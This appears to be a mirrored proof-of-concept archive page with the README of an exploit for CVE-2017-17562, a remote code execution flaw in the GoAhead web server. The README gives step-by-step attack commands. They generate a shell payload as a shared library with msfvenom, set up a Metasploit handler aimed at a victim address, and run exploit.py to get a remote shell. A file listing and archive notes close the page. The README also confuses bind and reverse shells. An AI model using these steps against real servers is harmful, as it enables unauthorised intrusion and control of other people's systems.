关联漏洞
描述
Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.
介绍
# GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution
Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.
## Usage
```sh
$ python3 exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]
```
## Requirements
```
$ python3 -m pip install -r requirements.txt
```
### Attention!
You need to generate the payload and set up the listening connection first.
Example:
(Attacker: 192.168.1.100 - Victim: 192.168.1.200)
```sh
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337
```
Then, in another shell, you must run this exploit to send the payload that will start the reverse connection to the listener!
### Arguments
```txt
Required arguments:
--host HOST Host running the GoAhead webserver.
--port PORT Port running the GoAhead webserver. Default: 80
--payload PAYLOAD Path to the payload.
Optional arguments:
--ssl Host is using SSL.
--cgi LIST Paths list to discover the CGI script on the GoAhead server. Default: paths.lst
```
## Example
```sh
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl
```
文件快照
[4.0K] /data/pocs/dd16c878a078985cb71f09da776b3dacdf9e65c5
├── [5.5K] exploit.py
├── [ 635] paths.lst
├── [1.6K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。